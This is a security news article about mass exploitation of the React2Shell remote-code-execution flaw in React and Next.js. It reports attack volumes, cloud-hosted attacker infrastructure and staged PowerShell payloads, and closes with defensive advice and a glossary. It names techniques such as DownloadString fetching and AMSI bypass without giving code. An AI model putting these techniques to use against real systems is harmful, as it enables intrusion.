Botnets on the Run: React2Shell Exploit Sparks Global Cloud Crimewave

It began as a routine vulnerability disclosure - a flaw in the React Server Components Flight protocol. But in just a few months, “React2Shell” (CVE-2025-55182) has spiraled into a cybercrime juggernaut, with more than 8.1 million attack attempts recorded worldwide. As the dust settles, security teams are scrambling to keep up with a threat that’s as fast-moving as it is relentless.

The Anatomy of a Modern Exploitation Frenzy

React2Shell isn’t just another bug - it’s a gateway for remote code execution in some of the internet’s most popular application frameworks, including React and Next.js. The vulnerability sits perilously close to the core application logic, often running with production-level permissions. In the wrong hands, it’s an open invitation to take control of servers, exfiltrate data, and launch further attacks.

Threat intelligence firm GreyNoise sounded the alarm as attack volumes exploded, peaking at over 430,000 daily attempts in December 2025 and now holding steady at around 300,000–400,000 per day. The scale is staggering: attackers have deployed over 70,000 unique payloads, constantly tweaking their methods to slip past defenses. Network forensics reveal a dizzying array of 700 HTTP client fingerprints and 340 TCP stack variations - proof that both amateur botnets and professional threat actors are in the game.

Clouds of Suspicion: AWS and the Rise of Attack-as-a-Service

Cloud computing isn’t just for startups and enterprise apps anymore - it’s the infrastructure of choice for cybercriminals. Amazon Web Services (AWS) alone is responsible for over a third of all observed attack traffic, with the top 15 cloud providers making up nearly 60 percent. Attackers spin up new virtual servers, launch their attacks, and disappear - sometimes within hours. Half of the malicious IPs involved were first seen after July 2025, underscoring just how quickly attackers can adapt and redeploy.

Payloads, PowerShell, and Persistence

The typical attack unfolds in stages. First come simple “proof-of-execution” commands - PowerShell arithmetic run on target machines to check if remote code execution is possible, leaving minimal evidence. If the coast is clear, attackers escalate to encoded PowerShell payloads, using obfuscation and “DownloadString” tricks to fetch and run second-stage malware. The final payloads often aim to disable Windows’ built-in Antimalware Scan Interface (AMSI), using reflection to slip past even hardened endpoint defenses.

Defensive Moves: What Works and What Doesn’t

Static IP blocklists are quickly outpaced by the attackers’ revolving door of new infrastructure. Security experts urge organizations to patch React and Next.js systems immediately and to use dynamic threat intelligence feeds for blocking. On endpoints, defenders should monitor for suspicious PowerShell activity - especially encoded commands, “DownloadString” usage, and AMSI bypass patterns. Enabling detailed script logging (Windows Event ID 4104) can be the difference between catching an early-stage compromise and becoming the next victim.

Conclusion: A New Normal for Web App Security

The React2Shell campaign is a wakeup call for the internet’s defenders. As attackers industrialize their operations, leveraging the cloud and automation, vulnerabilities are weaponized at breakneck speed. The lesson is clear: rapid patching, real-time intelligence, and vigilant endpoint monitoring are the new frontline in the battle against cybercrime’s ever-evolving arsenal.

WIKICROOK

• Remote Code Execution (RCE): Remote Code Execution (RCE) is when an attacker runs their own code on a victim’s system, often leading to full control or compromise of that system.
• PowerShell: PowerShell is a Windows scripting tool used for automation, but attackers often exploit it to perform malicious actions stealthily.
• Autonomous System Number (ASN): An ASN uniquely identifies a collection of IP networks managed by a network operator, enabling efficient routing and communication between networks on the internet.
• AMSI (Antimalware Scan Interface): AMSI is a Windows feature that lets security software scan and block malware hidden in scripts or applications, improving system protection.
• Obfuscation: Obfuscation is the practice of disguising code or data to make it difficult for humans or security tools to understand, analyze, or detect.